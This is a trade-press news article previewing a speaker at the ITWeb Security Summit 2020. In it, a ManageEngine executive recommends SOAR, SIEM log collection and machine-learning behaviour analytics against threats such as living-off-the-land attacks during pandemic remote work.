Harness SOAR and SIEM to boost IT security

Read time 2min 30sec

The need for organisations to strengthen their cyber security posture has become more critical than ever before. 

ITWeb Security Summit 2020

Register now for the ITWeb Security Summit 2020 virtual event, and experience four days of international keynotes, sessions and workshops all for one price. The event will feature over 50 speakers, with all content being made available on demand online. To register, and for more information, please click here.

In today’s digital era, practically every business has a hybrid infrastructure, which has enabled users to access information from anywhere. Although this is known to provide many benefits, it also paves the way for cyber-attacks, says Harish Sekar, head of business development at ManageEngine, a division of Zoho Corporation.

Sekar will be presenting on ‘The Role of SIEM in the POPI Act’, at the ITWeb Security Summit 2020, to be held as a virtual event from 25 to 28 August.

In his view, businesses should implement security orchestration, automation, and response (SOAR), as well as leverage artificial intelligence through machine learning to protect themselves from today’s threats. This is particularly true considering the COVID-19 pandemic. 

“The pandemic has seen work-from-home (WFH) policies become the norm, which has laid the way forward. Every organisation is now in a position where they need to make resources and data available to their users in all formats, and for all devices, including desktops, laptops and mobiles. And they need to protect them all.”

This, says Sekar, needs to be addressed from the top as hackers are just waiting for one small mistake or opening which could end up costing the company a fortune, not only in money, but in reputational damage.

“The biggest shift needs to be analysing user behaviour, connecting the dots instantly and tracing anomalies. This is where machine learning and AI will have an enormous impact,” he says.

Harish Sekar.
Harish Sekar.

In addition, he says every log should be pumped into a security incident and event management (SIEM) solution to help understand the actual operation within an organisation. “A well-connected SIEM solution will not only trace specific footprints but will also help remediate any necessary actions.”

Sekar says the cyber security threat landscape is changing rapidly, and will keep changing at an unprecedented pace. “There have always been three forms of threats: the known, the unknown, and the unknown and mysterious.”

He says end users have become tech-savvy and security-aware, but attackers have also raised their game. 

Hackers no longer need to install malware or rely on external tools as they did before. They have started using white-listed and trusted applications, launching so-called ‘living-off-the-land’ (LOTL) attacks which exploitpreinstalled features and default tools that already exist in the target environment, Sekar explains. 

The lesson is that businesses need to pay attention to the trends and monitor all activity within the organisation. “Pump every log into a SIEM solution to understand the actual operation within an organisation,” he concludes, “The results will surely surprise you.”

See also